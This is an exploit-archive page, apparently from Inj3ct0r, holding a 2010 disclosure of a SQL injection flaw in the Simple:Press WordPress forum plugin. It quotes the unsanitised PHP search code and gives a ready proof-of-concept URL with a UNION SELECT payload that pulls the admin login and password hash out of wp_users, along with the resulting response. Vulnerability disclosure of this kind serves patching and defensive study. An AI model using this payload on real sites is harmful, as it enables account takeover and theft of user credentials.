<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Simple:Press Wordpress Plugin SQL Injection Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>=========================================================
Simple:Press Wordpress Plugin SQL Injection Vulnerability
=========================================================

# Title: Simple:Press Wordpress Plugin SQL Injection Vulnerability
# Author: ADEO Security
# Published: 03/07/2010
# Version: v4.3.0 (Possible all versions)
# Vendor: http://simple-press.com
# Download: http://simple-press.com/download-manager.php?id=228

# Description: &quot;Simple:Press ? the feature rich, completely integrated
and fully scaleable forum plugin for WordPress.
Highly customisable, Simple:Press packs the features of a standalone
forum into a plugin ? seamlessly turning your WordPress site into a
community.&quot;

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
– Mail: security[AT]adeo.com.tr
– Web: http://security.adeo.com.tr

# Vulnerability:
In the search field, search values not filtered and inserted into sql
queries without using any quotes/single quotes and Simple:Press
execute this sql queries.

sf-header-forum.php
—[snip]—
385 # Add Search Vars

386 if(isset($_GET['search']))

387 {

388 if($_GET['search'] != ”) $sfvars['searchpage'] =
sf_esc_int($_GET['search']);

389 if(isset($_GET['value']) ? $sfvars['searchvalue'] =
stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] =
”);

390 if(isset($_GET['type']) ? $sfvars['searchtype'] =
sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);

400 if(isset($_GET['include']) ? $sfvars['searchinclude'] =
sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);

401 if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;

402 if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;

403 } else {
—[snip]—

At the line 389, HTTP GET Request &quot;value&quot; defined as global variable
$sfvars['searchvalue'] with filtering functions that stripslashes()
and urldecode() but they can’t secure it because in the
sf-database.php file the global variable $sfvar['searchvalue']
inserted into sql query without any quotes/single quotes.

sf-database.php
—[snip]—

401 $searchvalue=urldecode($sfvars['searchvalue']);

404 if($sfvars['searchtype'] == 6)

409 $ANDWHERE = &quot; AND topic_status_flag=&quot;.$sfvars['searchvalue'].&quot; &quot;;

410

411 } elseif($sfvars['searchtype'] == 8)

414 $userid = $sfvars['searchvalue'];

415 $SELECT = &quot;SELECT SQL_CALC_FOUND_ROWS DISTINCT &quot;;

416 $MATCH = &quot;&quot;;

417 $ANDWHERE = &quot; AND &quot;.SFPOSTS.&quot;.user_id=&quot;.$userid.&quot; &quot;;

418

419 } elseif($sfvars['searchtype'] == 9)

422 $userid = $sfvars['searchvalue'];

425 $ANDWHERE = &quot; AND &quot;.SFTOPICS.&quot;.user_id=&quot;.$userid.&quot; &quot;;

—[snip]—

Its successfully exploitable with search types 6,8,9. Please see # PoC section.

# PoC:
Request: http://server/wordpress/?page_id=4/&amp;forum=all&amp;value=9999+union+select+(select+concat_ws(0×3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)–+&amp;type=9&amp;search=1&amp;searchpage=2

Response: Topics started by admin:$P$B9TLvhE1l2swasFRlOcABmbhZteCCo.
(0 Matches Found)

# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-04]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13106